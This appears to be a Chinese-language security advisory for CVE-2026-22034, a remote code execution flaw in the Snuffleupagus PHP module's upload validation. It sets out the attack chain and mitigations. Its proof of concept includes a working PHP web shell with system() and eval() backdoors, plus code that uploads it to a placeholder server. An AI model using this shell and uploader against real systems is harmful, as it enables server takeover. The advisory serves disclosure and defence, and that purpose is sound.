CVE-2026-22034 Snuffleupagus上传验证远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-22034

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Snuffleupagus (< 0.13.0)

漏洞概述

CVE-2026-22034是Snuffleupagus PHP安全模块中的一个严重安全漏洞。Snuffleupagus旨在通过消除bug类和提供虚拟补丁系统来提高针对网站攻击的成本。然而在0.13.0之前的版本中，当启用非默认的上传验证功能并配置使用基于Vulcan Logic Disassembler (VLD)的上游验证脚本时，存在严重的远程代码执行风险。具体而言，如果VLD扩展在CLI SAPI中不可用，所有来自multipart POST请求的文件都会被当作PHP代码执行，攻击者可以借此在服务器上执行任意代码，完全控制受影响的系统。该漏洞无需认证即可利用，CVSS评分高达9.8，属于严重级别，对互联网上的Web服务器构成重大威胁。

技术细节

Snuffleupagus模块提供了基于VLD的上传验证功能，用于检测上传文件是否为有效的PHP代码。当管理员启用此功能并配置使用upload_validation.php或upload_validation.py脚本时，系统会调用VLD扩展来分析上传的文件内容。漏洞存在于src/sp_upload_validation.c的92-100行代码逻辑中：当VLD扩展在CLI SAPI环境中不可用时，验证函数会返回错误或跳过验证，但后续处理流程中并未正确阻止文件作为PHP代码执行。具体来说，当VLD扩展缺失时，上传验证脚本无法正常工作，导致所有通过multipart POST方式上传的文件都被PHP引擎当作有效代码执行。攻击者只需构造一个包含恶意PHP代码的文件上传请求，即可实现远程代码执行。

攻击链分析

STEP 1

步骤1

攻击者识别目标服务器是否运行Snuffleupagus模块且版本低于0.13.0

STEP 2

步骤2

攻击者确认目标服务器启用了上传验证功能，但VLD扩展未安装或不可用

STEP 3

步骤3

攻击者构造包含恶意PHP代码的multipart POST请求，上传伪装成普通文件的webshell

STEP 4

步骤4

Snuffleupagus的上传验证脚本因VLD扩展缺失而无法正常执行验证逻辑

STEP 5

步骤5

恶意文件绕过验证被保存到服务器可访问目录，PHP引擎将其作为代码执行

STEP 6

步骤6

攻击者通过访问上传的webshell执行任意系统命令，完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2026-22034 PoC - Snuffleupagus Upload Validation RCE
// This PoC demonstrates how a malicious PHP file can be executed
// when Snuffleupagus upload validation is enabled without VLD extension

// Malicious file content to be uploaded
$malicious_payload = '<?php
// Attempt to execute system commands
if(isset($_GET["cmd"])) {
    echo "<pre>";
    system($_GET["cmd"]);
    echo "</pre>";
}
// Or backdoor connection
@eval($_POST["backdoor"]);
?>';

// Simulate multipart POST upload request
$boundary = "----WebKitFormBoundary" . bin2hex(random_bytes(16));

$post_data = "--$boundary\r\n";
$post_data .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$post_data .= "Content-Type: application/x-php\r\n\r\n";
$post_data .= $malicious_payload . "\r\n";
$post_data .= "--$boundary--\r\n";

// Send the malicious upload request
$ch = curl_init("http://target-server.com/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Content-Type: multipart/form-data; boundary=$boundary"
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Upload completed. Access shell at: http://target-server.com/uploads/shell.php?cmd=id\n";
?>

影响范围

Snuffleupagus < 0.13.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在php.ini中配置open_basedir限制上传目录访问；2) 将上传目录设置为不可执行，确保即使文件被保存也无法被PHP引擎执行；3) 禁用Snuffleupagus的上传验证功能或切换到不使用VLD的验证方式；4) 使用文件类型白名单机制，在应用层严格验证上传文件类型。